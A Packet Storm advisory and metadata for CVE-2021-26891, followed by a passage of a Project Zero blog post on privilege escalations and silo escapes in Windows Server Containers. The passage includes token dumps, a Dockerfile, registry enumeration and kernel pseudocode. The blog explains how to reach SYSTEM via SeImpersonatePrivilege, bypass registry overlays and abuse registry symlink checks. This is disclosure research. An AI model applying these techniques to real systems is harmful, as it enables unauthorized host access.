ID PACKETSTORM:161734 Type packetstorm Reporter James Forshaw Modified 2021-03-10T00:00:00
Description
`Windows Containers: ContainerUser has Elevated Privileges
Windows Containers: ContainerUser has Elevated Privileges
Platform: Windows 10 20H2 (not tested other versions)
Class: Elevation of Privilege
Security Boundary: User
Summary:
The standard user ContainerUser in a Windows Container has elevated privileges and High integrity level which results in making it administrator equivalent even though it should be a restricted user.
Description:
Windows Containers setup two default user accounts, which are created by the CExecSvc service. The first user, ContainerAdministrator is a full administrator. The second user, ContainerUser you would assume is not supposed to be an administrator. However, both users are created as virtual service accounts, this results in ContainerUser being granted SeImpersonatePrivilege, SeCreateGlobalPrivilege and runs with a High integrity level.
At a minimum having SeImpersonatePrivilege is considered administrator equivalent. You can use public exploits such as RogueWinRM (https://github.com/antonioCoco/RogueWinRM) to get SYSTEM from ContainerUser, but I'm sure there are other techniques to do the same thing.
For example the following is the output from a ServerCore 20H2 image running in Hyper-V (but the container isolation doesn't seem to matter).
C:\\> ver
Microsoft Windows [Version 10.0.19042.685]
C:\\> whoami /groups /priv
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\\High Mandatory Level Label S-1-16-12288
...
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
The issue is as far as I understand it ContainerUser should not be administrator equivalent otherwise there seems little point to have two separate users. I'd recommend ensuring SeCreateGlobalPrivilege is also removed, while it's not as easy to exploit it could still provide a means of compromising the container. Also the CExecSvc looks to be code written and signed by Microsoft so I assume it's in scope as a Microsoft product.
Proof of Concept:
I just installed Docker Desktop on Windows 10 20H2. Then ran the command:
C:\\> docker run --user=ContainerUser -it mcr.microsoft.com/windows/servercore:20H2
Then in the container I ran the following command to display the user's details.
C:\\> whoami /groups /priv
Expected Result:
The ContainerUser does not have elevated privileges.
Observed Result:
The ContainerUser has SeImpersonatePrivilege.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse,
the bug report will become visible to the public. The scheduled disclosure
date is 2021-03-14. Disclosure at an earlier date is also possible if
agreed upon by all parties.
Related CVE Numbers: CVE-2021-26891.
Found by: forshaw@google.com
`
{"id": "PACKETSTORM:161734", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Microsoft Windows Containers Privilege Escalation", "description": "", "published": "2021-03-10T00:00:00", "modified": "2021-03-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/161734/Microsoft-Windows-Containers-Privilege-Escalation.html", "reporter": "James Forshaw", "references": [], "cvelist": ["CVE-2021-26891"], "lastseen": "2021-03-10T16:13:05", "viewCount": 295, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-26891"]}, {"type": "mscve", "idList": ["MS:CVE-2021-26891"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:54650A68451B75723C5A9B2F8A177154"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_MAR_5000808.NASL", "SMB_NT_MS21_MAR_5000822.NASL", "SMB_NT_MS21_MAR_5000802.NASL", "SMB_NT_MS21_MAR_5000803.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-03-10T16:13:05", "rev": 2}, "score": {"value": 5.0, "vector": "NONE", "modified": "2021-03-10T16:13:05", "rev": 2}, "vulnersScore": 5.0}, "sourceHref": "https://packetstormsecurity.com/files/download/161734/GS20210310152945.txt", "sourceData": "`Windows Containers: ContainerUser has Elevated Privileges \n \nWindows Containers: ContainerUser has Elevated Privileges \nPlatform: Windows 10 20H2 (not tested other versions) \nClass: Elevation of Privilege \nSecurity Boundary: User \n \nSummary: \nThe standard user ContainerUser in a Windows Container has elevated privileges and High integrity level which results in making it administrator equivalent even though it should be a restricted user. \n \nDescription: \nWindows Containers setup two default user accounts, which are created by the CExecSvc service. The first user, ContainerAdministrator is a full administrator. The second user, ContainerUser you would assume is not supposed to be an administrator. However, both users are created as virtual service accounts, this results in ContainerUser being granted SeImpersonatePrivilege, SeCreateGlobalPrivilege and runs with a High integrity level. \n \nAt a minimum having SeImpersonatePrivilege is considered administrator equivalent. You can use public exploits such as RogueWinRM (https://github.com/antonioCoco/RogueWinRM) to get SYSTEM from ContainerUser, but I'm sure there are other techniques to do the same thing. \n \nFor example the following is the output from a ServerCore 20H2 image running in Hyper-V (but the container isolation doesn't seem to matter). \n \nC:\\\\> ver \nMicrosoft Windows [Version 10.0.19042.685] \n \nC:\\\\> whoami /groups /priv \nGROUP INFORMATION \n----------------- \n \nGroup Name Type SID Attributes \n==================================== ================ ============ ================================================== \nMandatory Label\\\\High Mandatory Level Label S-1-16-12288 \n... \n \nPRIVILEGES INFORMATION \n---------------------- \nPrivilege Name Description State \n============================= ========================================= ======== \nSeChangeNotifyPrivilege Bypass traverse checking Enabled \nSeImpersonatePrivilege Impersonate a client after authentication Enabled \nSeCreateGlobalPrivilege Create global objects Enabled \nSeIncreaseWorkingSetPrivilege Increase a process working set Disabled \n \nThe issue is as far as I understand it ContainerUser should not be administrator equivalent otherwise there seems little point to have two separate users. I'd recommend ensuring SeCreateGlobalPrivilege is also removed, while it's not as easy to exploit it could still provide a means of compromising the container. Also the CExecSvc looks to be code written and signed by Microsoft so I assume it's in scope as a Microsoft product. \n \nProof of Concept: \n \nI just installed Docker Desktop on Windows 10 20H2. Then ran the command: \nC:\\\\> docker run --user=ContainerUser -it mcr.microsoft.com/windows/servercore:20H2 \n \nThen in the container I ran the following command to display the user's details. \nC:\\\\> whoami /groups /priv \n \nExpected Result: \nThe ContainerUser does not have elevated privileges. \n \nObserved Result: \nThe ContainerUser has SeImpersonatePrivilege. \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse, \nthe bug report will become visible to the public. The scheduled disclosure \ndate is 2021-03-14. Disclosure at an earlier date is also possible if \nagreed upon by all parties. \n \n \nRelated CVE Numbers: CVE-2021-26891. \n \n \n \nFound by: forshaw@google.com \n \n`\n", "immutableFields": []}
{"cve": [{"lastseen": "2021-03-13T14:41:21", "description": "Windows Container Execution Agent Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-26865.", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-11T16:15:00", "title": "CVE-2021-26891", "type": "cve", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26891"], "modified": "2021-03-12T21:36:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-26891", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26891", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*"]}], "mscve": [{"lastseen": "2021-03-18T19:14:00", "bulletinFamily": "microsoft", "cvelist": ["CVE-2021-26891"], "description": "\n", "modified": "2021-03-09T08:00:00", "id": "MS:CVE-2021-26891", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26891", "published": "2021-03-09T08:00:00", "type": "mscve", "title": "Windows Container Execution Agent Elevation of Privilege Vulnerability", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "googleprojectzero": [{"lastseen": "2021-04-01T19:24:49", "bulletinFamily": "info", "cvelist": ["CVE-2021-24096", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26891"], "description": "Posted by James Forshaw, Project Zero\n\nThis is a short blog post about a research project I conducted on Windows Server Containers that resulted in four privilege escalations which Microsoft fixed in March 2021. In the post, I describe what led to this research, my research process, and insights into what to look for if you\u2019re researching this area.\n\n## Windows Containers Background\n\nWindows 10 and its server counterparts added support for application containerization. The implementation in Windows is similar in concept to Linux containers, but of course wildly different. The well-known Docker platform supports Windows containers which leads to the availability of related projects such as Kubernetes running on Windows. You can read a bit of background on Windows containers on [MSDN](<https://docs.microsoft.com/en-us/virtualization/windowscontainers/about/>). I\u2019m not going to go in any depth on how containers work in Linux as very little is applicable to Windows.\n\nThe primary goal of a container is to hide the real OS from an application. For example, in Docker you can download a standard container image which contains a completely separate copy of Windows. The image is used to build the container which uses a feature of the Windows kernel called a Server Silo allowing for redirection of resources such as the object manager, registry and networking. The server silo is a special type of [Job object](<https://docs.microsoft.com/en-us/windows/win32/procthread/job-objects>), which can be assigned to a process. \n\n[](<https://1.bp.blogspot.com/-mKtn-agfB2M/YFTt-NApHyI/AAAAAAAAaxo/i50NObex2No87aTpiQ_nib9XQa_9wkFewCNcBGAsYHQ/s759/image1%2B%25283%2529.png>)\n\nThe application running in the container, as far as possible, will believe it\u2019s running in its own unique OS instance. Any changes it makes to the system will only affect the container and not the real OS which is hosting it. This allows an administrator to bring up new instances of the application easily as any system or OS differences can be hidden. \n\nFor example the container could be moved between different Windows systems, or even to a Linux system with the appropriate virtualization and the application shouldn\u2019t be able to tell the difference. Containers shouldn\u2019t be confused with virtualization however, which provides a consistent hardware interface to the OS. A container is more about providing a consistent OS interface to applications.\n\nRealistically, containers are mainly about using their isolation primitives for hiding the real OS and providing a consistent configuration in which an application can execute. However, there\u2019s also some potential security benefit to running inside a container, as the application shouldn\u2019t be able to directly interact with other processes and resources on the host.\n\nThere are two supported types of containers: Windows Server Containers and Hyper-V Isolated Containers. Windows Server Containers run under the current kernel as separate processes inside a server silo. Therefore a single kernel vulnerability would allow you to escape the container and access the host system.\n\nHyper-V Isolated Containers still run in a server silo, but do so in a separate lightweight VM. You can still use the same kernel vulnerability to escape the server silo, but you\u2019re still constrained by the VM and hypervisor. To fully escape and access the host you\u2019d need a separate VM escape as well.\n\n[](<https://1.bp.blogspot.com/--sV6vWTF71Y/YFTt_bAuKaI/AAAAAAAAaxs/sSIYUpz8CHQ-tXh2OsNq6p9jLwiKXEXeACNcBGAsYHQ/s608/image2%2B%25282%2529.png>)\n\nThe current [MSRC security servicing criteria](<https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria>) states that Windows Server Containers are not a security boundary as you still have direct access to the kernel. However, if you use Hyper-V isolation, a silo escape wouldn\u2019t compromise the host OS directly as the security boundary is at the hypervisor level. That said, escaping the server silo is likely to be the first step in attacking Hyper-V containers meaning an escape is still useful as part of a chain.\n\nAs Windows Server Containers are not a security boundary any bugs in the feature won\u2019t result in a security bulletin being issued. Any issues might be fixed in the next major version of Windows, but they might not be.\n\n## Origins of the Research\n\nOver a year ago I was asked for some advice by [Daniel Prizmant](<https://unit42.paloaltonetworks.com/author/daniel-prizmant/>), a researcher at Palo Alto Networks on some details around Windows object manager symbolic links. Daniel was doing research into Windows containers, and wanted help on a feature which allows symbolic links to be marked as global which allows them to reference objects outside the server silo. I recommend reading Daniel\u2019s [blog post](<https://unit42.paloaltonetworks.com/what-i-learned-from-reverse-engineering-windows-containers/>) for more in-depth information about Windows containers.\n\nKnowing a little bit about symbolic links I was able to help fill in some details and usage. About seven months later Daniel released a second [blog post](<https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/>), this time describing how to use global symbolic links to escape a server silo Windows container. The result of the exploit is the user in the container can access resources outside of the container, such as files.\n\nThe global symbolic link feature needs SeTcbPrivilege to be enabled, which can only be accessed from SYSTEM. The exploit therefore involved injecting into a system process from the default administrator user and running the exploit from there. Based on the blog post, I thought it could be done easier without injection. You could impersonate a SYSTEM token and do the exploit all in process. I wrote a simple proof-of-concept in PowerShell and put it up on [Github](<https://gist.github.com/tyranid/bf8a890e615d310c7193901a1c7e0e3a>). \n\nFast forward another few months and a Googler reached out to ask me some questions about Windows Server Containers. Another researcher at Palo Alto Networks had reported to Google Cloud that Google Kubernetes Engine (GKE) was vulnerable to the issue Daniel had identified. Google Cloud was using Windows Server Containers to run Kubernetes, so it was possible to escape the container and access the host, which was not supposed to be accessible. \n\nMicrosoft had not patched the issue and it was still exploitable. They hadn\u2019t patched it because Microsoft does not consider these issues to be serviceable. Therefore the GKE team was looking for mitigations. One proposed mitigation was to enforce the containers to run under the ContainerUser account instead of the ContainerAdministrator. As the reported issue only works when running as an administrator that would seem to be sufficient. \n\nHowever, I wasn\u2019t convinced there weren't similar vulnerabilities which could be exploited from a non-administrator user. Therefore I decided to do my own research into Windows Server Containers to determine if the guidance of using ContainerUser would really eliminate the risks.\n\nWhile I wasn\u2019t expecting MS to fix anything I found it would at least allow me to provide internal feedback to the GKE team so they might be able to better mitigate the issues. It also establishes a rough baseline of the risks involved in using Windows Server Containers. It\u2019s known to be problematic, but how problematic?\n\n## Research Process\n\nThe first step was to get some code running in a representative container. Nothing that had been reported was specific to GKE, so I made the assumption I could just run a local Windows Server Container. \n\nSetting up your own server silo from scratch is undocumented and almost certainly unnecessary. When you enable the Container support feature in Windows, the Hyper-V Host Compute Service is installed. This takes care of setting up both Hyper-V and process isolated containers. The API to interact with this service isn\u2019t officially documented, however Microsoft has provided public wrappers (with scant documentation), for example this is the [Go wrapper](<https://github.com/microsoft/hcsshim>).\n\nRealistically it\u2019s best to just use [Docker](<https://www.docker.com/products/docker-desktop>) which takes the MS provided Go wrapper and implements the more familiar Docker CLI. While there\u2019s likely to be Docker-specific escapes, the core functionality of a Windows Docker container is all provided by Microsoft so would be in scope. Note, there are two versions of Docker: Enterprise which is only for server systems and Desktop. I primarily used Desktop for convenience.\n\nAs an aside, MSRC does not count any issue as crossing a security boundary where being a member of the Hyper-V Administrators group is a prerequisite. Using the Hyper-V Host Compute Service requires membership of the Hyper-V Administrators group. However Docker runs at sufficient privilege to not need the user to be a member of the group. Instead access to Docker is gated by membership of the separate docker-users group. If you get code running under a non-administrator user that has membership of the docker-users group you can use that to get full administrator privileges by abusing Docker\u2019s server silo support.\n\nFortunately for me most Windows Docker images come with .NET and PowerShell installed so I could use my existing toolset. I wrote a simple docker file containing the following:\n\nFROM mcr.microsoft.com/windows/servercore:20H2\n\nUSER ContainerUser\n\nCOPY NtObjectManager c:/NtObjectManager \n\nCMD [ \"powershell\", \"-noexit\", \"-command\", \\\n\n\"Import-Module c:/NtObjectManager/NtObjectManager.psd1\" ] \n \n--- \n \nThis docker file will download a Windows Server Core 20H2 container image from the [Microsoft Container Registry](<https://github.com/microsoft/containerregistry>), copy in my NtObjectManager PowerShell module and then set up a command to load that module on startup. I also specified that the PowerShell process would run as the user ContainerUser so that I could test the mitigation assumptions. If you don\u2019t specify a user it\u2019ll run as ContainerAdministrator by default.\n\nNote, when using process isolation mode the container image version must match the host OS. This is because the kernel is shared between the host and the container and any mismatch between the user-mode code and the kernel could result in compatibility issues. Therefore if you\u2019re trying to replicate this you might need to change the name for the container image.\n\nCreate a directory and copy the contents of the docker file to the filename dockerfile in that directory. Also copy in a copy of my [PowerShell module](<https://www.powershellgallery.com/packages/NtObjectManager/1.1.30>) into the same directory under the NtObjectManager directory. Then in a command prompt in that directory run the following commands to build and run the container.\n\nC:\\container> docker build -t test_image .\n\nStep 1/4 : FROM mcr.microsoft.com/windows/servercore:20H2\n\n\\---> b29adf5cd4f0\n\nStep 2/4 : USER ContainerUser\n\n\\---> Running in ac03df015872\n\nRemoving intermediate container ac03df015872\n\n\\---> 31b9978b5f34\n\nStep 3/4 : COPY NtObjectManager c:/NtObjectManager\n\n\\---> fa42b3e6a37f\n\nStep 4/4 : CMD [ \"powershell\", \"-noexit\", \"-command\", \"Import-Module c:/NtObjectManager/NtObjectManager.psd1\" ]\n\n\\---> Running in 86cad2271d38\n\nRemoving intermediate container 86cad2271d38\n\n\\---> e7d150417261\n\nSuccessfully built e7d150417261\n\nSuccessfully tagged test_image:latest\n\nC:\\container> docker run --isolation=process -it test_image\n\nPS> \n \n--- \n \nI wanted to run code using process isolation rather than in Hyper-V isolation, so I needed to specify the \\--isolation=process argument. This would allow me to more easily see system interactions as I could directly debug container processes if needed. For example, you can use Process Monitor to monitor file and registry access. Docker Enterprise uses process isolation by default, whereas Desktop uses Hyper-V isolation. \n\nI now had a PowerShell console running inside the container as ContainerUser. A quick way to check that it was successful is to try and find the CExecSvc process, which is the Container Execution Agent service. This service is used to spawn your initial PowerShell console.\n\nPS> Get-Process -Name CExecSvc\n\nHandles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName\n\n\\------- ------ ----- ----- ------ -- -- -----------\n\n86 6 1044 5020 4560 6 CExecSvc \n \n--- \n \nWith a running container it was time to start poking around to see what\u2019s available. The first thing I did was dump the ContainerUser\u2019s token just to see what groups and privileges were assigned. You can use the Show-NtTokenEffective command to do that.\n\nPS> Show-NtTokenEffective -User -Group -Privilege\n\nUSER INFORMATION\n\n\\----------------\n\nName Sid\n\n\\---- ---\n\nUser Manager\\ContainerUser S-1-5-93-2-2\n\nGROUP SID INFORMATION\n\n\\-----------------\n\nName Attributes\n\n\\---- ----------\n\nMandatory Label\\High Mandatory Level Integrity, ...\n\nEveryone Mandatory, ...\n\nBUILTIN\\Users Mandatory, ...\n\nNT AUTHORITY\\SERVICE Mandatory, ...\n\nCONSOLE LOGON Mandatory, ...\n\nNT AUTHORITY\\Authenticated Users Mandatory, ...\n\nNT AUTHORITY\\This Organization Mandatory, ...\n\nNT AUTHORITY\\LogonSessionId_0_10357759 Mandatory, ...\n\nLOCAL Mandatory, ...\n\nUser Manager\\AllContainers Mandatory, ...\n\nPRIVILEGE INFORMATION\n\n\\---------------------\n\nName Luid Enabled\n\n\\---- ---- -------\n\nSeChangeNotifyPrivilege 00000000-00000017 True\n\nSeImpersonatePrivilege 00000000-0000001D True\n\nSeCreateGlobalPrivilege 00000000-0000001E True\n\nSeIncreaseWorkingSetPrivilege 00000000-00000021 False \n \n--- \n \nThe groups didn\u2019t seem that interesting, however looking at the privileges we have SeImpersonatePrivilege. If you have this privilege you can impersonate any other user on the system including administrators. MSRC considers having SeImpersonatePrivilege as administrator equivalent, meaning if you have it you can assume you can get to administrator. Seems ContainerUser is not quite as normal as it should be.\n\nThat was a very bad (or good) start to my research. The prior assumption was that running as ContainerUser would not grant administrator privileges, and therefore the global symbolic link issue couldn\u2019t be directly exploited. However that turns out to not be the case in practice. As an example you can use the public [RogueWinRM exploit](<https://github.com/antonioCoco/RogueWinRM>) to get a SYSTEM token as long as WinRM isn\u2019t enabled, which is the case on most Windows container images. There are no doubt other less well known techniques to achieve the same thing. The code which creates the user account is in CExecSvc, which is code owned by Microsoft and is not specific to Docker.\n\nNextI used the NtObject drive provider to list the object manager namespace. For example checking the Device directory shows what device objects are available.\n\nPS> ls NtObject:\\Device\n\nName TypeName\n\n\\---- --------\n\nIp SymbolicLink\n\nTcp6 SymbolicLink\n\nHttp Directory\n\nIp6 SymbolicLink\n\nahcache SymbolicLink\n\nWMIDataDevice SymbolicLink\n\nLanmanDatagramReceiver SymbolicLink\n\nTcp SymbolicLink\n\nLanmanRedirector SymbolicLink\n\nDxgKrnl SymbolicLink\n\nConDrv SymbolicLink\n\nNull SymbolicLink\n\nMailslotRedirector SymbolicLink\n\nNamedPipe Device\n\nUdp6 SymbolicLink\n\nVhdHardDisk{5ac9b14d-61f3-4b41-9bbf-a2f5b2d6f182} SymbolicLink\n\nKsecDD SymbolicLink\n\nDeviceApi SymbolicLink\n\nMountPointManager Device\n\n... \n \n--- \n \nInterestingly most of the device drivers are symbolic links (almost certainly global) instead of being actual device objects. But there are a few real device objects available. Even the VHD disk volume is a symbolic link to a device outside the container. There\u2019s likely to be some things lurking in accessible devices which could be exploited, but I was still in reconnaissance mode.\n\nWhat about the registry? The container should be providing its own Registry hives and so there shouldn\u2019t be anything accessible outside of that. After a few tests I noticed something very odd.\n\nPS> ls HKLM:\\SOFTWARE | Select-Object Name\n\nName\n\n\\----\n\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\n\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Clients\n\nHKEY_LOCAL_MACHINE\\SOFTWARE\\DefaultUserEnvironment\n\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\n\nHKEY_LOCAL_MACHINE\\SOFTWARE\\ODBC\n\nHKEY_LOCAL_MACHINE\\SOFTWARE\\OpenSSH\n\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\n\nHKEY_LOCAL_MACHINE\\SOFTWARE\\RegisteredApplications\n\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Setup\n\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\n\nPS> ls NtObject:\\REGISTRY\\MACHINE\\SOFTWARE | Select-Object Name\n\nName\n\n\\----\n\nClasses\n\nClients\n\nDefaultUserEnvironment\n\nDocker Inc.\n\nIntel\n\nMacromedia\n\nMicrosoft\n\nODBC\n\nOEM\n\nOpenSSH\n\nPartner\n\nPolicies\n\nRegisteredApplications\n\nWindows\n\nWOW6432Node \n \n--- \n \nThe first command is querying the local machine SOFTWARE hive using the built-in [Registry drive provider](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_registry_provider>). The second command is using my module\u2019s object manager provider to list the same hive. If you look closely the list of keys is different between the two commands. Maybe I made a mistake somehow? I checked some other keys, for example the user hive attachment point:\n\nPS> ls NtObject:\\REGISTRY\\USER | Select-Object Name\n\nName\n\n\\----\n\n.DEFAULT\n\nS-1-5-19\n\nS-1-5-20\n\nS-1-5-21-426062036-3400565534-2975477557-1001\n\nS-1-5-21-426062036-3400565534-2975477557-1001_Classes\n\nS-1-5-21-426062036-3400565534-2975477557-1003\n\nS-1-5-18\n\nPS> Get-NtSid\n\nName Sid\n\n\\---- ---\n\nUser Manager\\ContainerUser S-1-5-93-2-2 \n \n--- \n \nNo, it still looked wrong. The ContainerUser\u2019s SID is S-1-5-93-2-2, you\u2019d expect to see a loaded hive for that user SID. However you don\u2019t see one, instead you see S-1-5-21-426062036-3400565534-2975477557-1001 which is the SID of the user outside the container. \n\nSomething funny was going on. However, this behavior is something I\u2019ve seen before. Back in 2016 I reported [a bug](<https://bugs.chromium.org/p/project-zero/issues/detail?id=870>) with application hives where you couldn\u2019t open the \\REGISTRY\\A attachment point directly, but you could if you opened \\REGISTRY then did a relative open to A. It turns out that by luck my registry enumeration code in the module\u2019s drive provider uses relative opens using the native system calls, whereas the PowerShell built-in uses absolute opens through the Win32 APIs. Therefore, this was a manifestation of a similar bug: doing a relative open was ignoring the registry overlays and giving access to the real hive.\n\nThis grants a non-administrator user access to any registry key on the host, as long as ContainerUser can pass the key\u2019s access check. You could imagine the host storing some important data in the registry which the container can now read out, however using this to escape the container would be hard. That said, all you need to do is abuse SeImpersonatePrivilege to get administrator access and you can immediately start modifying the host\u2019s registry hives. \n\nThe fact that I had two bugs in less than a day was somewhat concerning, however at least that knowledge can be applied to any mitigation strategy. I thought I should dig a bit deeper into the kernel to see what else I could exploit from a normal user.\n\n## A Little Bit of Reverse Engineering\n\nWhile just doing basic inspection has been surprisingly fruitful it was likely to need some reverse engineering to shake out anything else. I know from previous experience on Desktop Bridge how the registry overlays and object manager redirection works when combined with silos. In the case of Desktop Bridge it uses application silos rather than server silos but they go through similar approaches.\n\nThe main enforcement mechanism used by the kernel to provide the container\u2019s isolation is by calling a function to check whether the process is in a silo and doing something different based on the result. I decided to try and track down where the silo state was checked and see if I could find any misuse. You\u2019d think the kernel would only have a few functions which would return the current silo state. Unfortunately you\u2019d be wrong, the following is a short list of the functions I checked:\n\nIoGetSilo, IoGetSiloParameters, MmIsSessionInCurrentServerSilo, OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO, ObGetSiloRootDirectoryPath, ObpGetSilosRootDirectory, PsGetCurrentServerSilo, PsGetCurrentServerSiloGlobals, PsGetCurrentServerSiloName, PsGetCurrentSilo, PsGetEffectiveServerSilo, PsGetHostSilo, PsGetJobServerSilo, PsGetJobSilo, PsGetParentSilo, PsGetPermanentSiloContext, PsGetProcessServerSilo, PsGetProcessSilo, PsGetServerSiloActiveConsoleId, PsGetServerSiloGlobals, PsGetServerSiloServiceSessionId, PsGetServerSiloState, PsGetSiloBySessionId, PsGetSiloContainerId, PsGetSiloContext, PsGetSiloIdentifier, PsGetSiloMonitorContextSlot, PsGetThreadServerSilo, PsIsCurrentThreadInServerSilo, PsIsHostSilo, PsIsProcessInAppSilo, PsIsProcessInSilo, PsIsServerSilo, PsIsThreadInSilo \n \n--- \n \nOf course that\u2019s not a comprehensive list of functions, but those are the ones that looked the most likely to either return the silo and its properties or check if something was in a silo. Checking the references to these functions wasn\u2019t going to be comprehensive, for various reasons:\n\n 1. We\u2019re only checking for bad checks, not the lack of a check.\n 2. The kernel has the structure type definition for the Job object which contains the silo, so the call could easily be inlined.\n 3. We\u2019re only checking the kernel, many of these functions are exported for driver use so could be called by other kernel components that we\u2019re not looking at.\n\nThe first issue I found was due to a call to PsIsCurrentThreadInServerSilo. I noticed a reference to the function inside CmpOKToFollowLink which is a function that\u2019s responsible for enforcing symlink checks in the registry. At a basic level, registry symbolic links are not allowed to traverse from an untrusted hive to a trusted hive. \n\nFor example if you put a symbolic link in the current user\u2019s hive which redirects to the local machine hive the CmpOKToFollowLink will return FALSE when opening the key and the operation will fail. This prevents a user planting symbolic links in their hive and finding a privileged application which will write to that location to elevate privileges.\n\nBOOLEAN CmpOKToFollowLink(PCMHIVE SourceHive, PCMHIVE TargetHive) {\n\nif (PsIsCurrentThreadInServerSilo()\n\n|| !TargetHive \n\n|| TargetHive == SourceHive) {\n\nreturn TRUE;\n\n}\n\nif (SourceHive->Flags.Trusted)\n\nreturn FALSE;\n\n// Check trust list.\n\n} \n \n--- \n \nLooking at CmpOKToFollowLink we can see where PsIsCurrentThreadInServerSilo is being used. If the current thread is in a server silo then all links are allowed between any hives. The check for the trusted state of the source hive only happens after this initial check so is bypassed. I\u2019d speculate that during development the registry overlays couldn\u2019t be marked as trusted so a symbolic link in an overlay would not be followed to a trusted hive it was overlaying, causing problems. Someone presumably added this bypass to get things working, but no one realized they needed to remove it when support for trusted overlays was added. \n\nTo exploit this in a container I needed to find a privileged kernel component which would write to a registry key that I could control. I found a good primitive inside Win32k for supporting FlickInfo configuration (which seems to be related in some way to touch input, but it\u2019s not documented). When setting the configuration Win32k would create a known key in the current user\u2019s hive. I could then redirect the key creation to the local machine hive allowing creation of arbitrary keys in a privileged location. I don\u2019t believe this primitive could be directly combined with the registry silo escape issue but I didn\u2019t investigate too deeply. At a minimum this would allow a non-administrator user to elevate privileges inside a container, where you could then use registry silo escape to write to the host registry.\n\nThe second issue was due to a call to OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO. This function would get the root object manager namespace directory for a silo.\n\nPOBJECT_DIRECTORY OBP_GET_SILO_ROOT_DIRECTORY_FROM_SILO(PEJOB Silo) {\n\nif (Silo) {\n\nPPSP_STORAGE Storage = Silo->Storage;\n\nPPSP_SLOT Slot = Storage->Slot[PsObjectDirectorySiloContextSlot];\n\nif (Slot->Present)\n\nreturn Slot->Value;\n\n}\n\nreturn ObpRootDirectoryObject;\n\n} \n \n--- \n \nWe can see that the function will extract a storage parameter from the passed-in silo, if present it will return the value of the slot. If the silo is NULL or the slot isn\u2019t present then the global root directory stored in ObpRootDirectoryObject is returned. When the server silo is set up the slot is populated with a new root directory so this function should always return the silo root directory rather than the real global root directory. \n\nThis code seems perfectly fine, if the server silo is passed in it should always return the silo root object directory. The real question is, what silo do the callers of this function actually pass in? We can check that easily enough, there are only two callers and they both have the following code.\n\nPEJOB silo = PsGetCurrentSilo();\n\nRoot 